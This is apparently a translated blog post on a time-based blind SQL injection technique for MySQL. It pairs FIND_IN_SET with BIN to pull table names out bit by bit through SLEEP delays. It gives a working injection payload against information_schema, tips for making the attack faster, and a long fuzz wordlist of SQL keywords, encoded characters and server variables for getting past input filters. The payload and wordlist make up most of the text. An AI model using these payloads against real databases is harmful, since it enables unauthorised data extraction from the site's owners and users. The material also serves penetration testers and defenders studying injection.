text
This method is better than dichotomy, bit inference, etc.
Original address
Sample query request code:
AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{
,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5));
Explanation
1 is positive, 0 is false, and the SLEEP(5) delay is empty (represented as the last bit).
The principle can refer to the original text. The advantage of the method is that there are fewer requests, but the disadvantage is that the case cannot be determined (MySQL string comparison is not distinguished), SLEEP() takes too long, and so on.
There are many things that can be optimized. For example, a-z0-9 is generally enough to guess the user name, and the case-sensitive password such as CHAR() will work, like this
FIND_IN_SET(CHAR(MID(table_name,1,1)), ’97,98,99′),SLEEP(3)
Too time-consuming, you can consider using runtime to report errors (such as 1/0, escape®ex...), and the first one does not have to guess at all, it must be always 1, etc. If you want to use this technology, you have to consider all of these, but Generally speaking, this method is still very sharp and I admire it.
Recommendations
Xiaobai has only tested it in his own environment, which is more convenient than the current dichotomy.
Let me say that, in the actual application, we can make more restrictions on the sleep time.
There is no need to run the character test all at once, you can use the idea of dichotomy to guess the solution.
Of course, you need to perform a fuzz test first when you encounter character filtering.
Attach your own fuzz here
and
AND
&&
or
OR
xor
||
between
binary
|
&
=
like
LIKE
>
<
(
)
')
('
()
'
"
`
@
!
/*
*/
-
+
--
--
--+
#
\
;
;show databases;#
;show databases;%23
.
^
,
*,1
select
SELECT
union
UNION
order
by
from
where
database
limit
offset
information
schema
table
column
count
concat
group_concat
id
regexp
substr
mid
left
ascii
sleep
join
right
updatexml
extractvalue
exp
EXP
insert
into
delete
update
alter
create
all
distinct
not
as
desc
asc
having
floor
char
;%00
geometrycollection
polygon
multipoint
multilinestring
linestring
multipolygon
handler
having
version()
database()
user()
@@datadir
@@basedir
@@version_compile_os
@@hostname
@@global.secure_file_priv
%0a
%0d
%09
%df
%20
%23
%27
%'
%1$
CREATE
END
reverse
group
if
case
drop
for
relike
rlike
like
in
else
ord
chat
hex
is
is not
outfile
bin
substring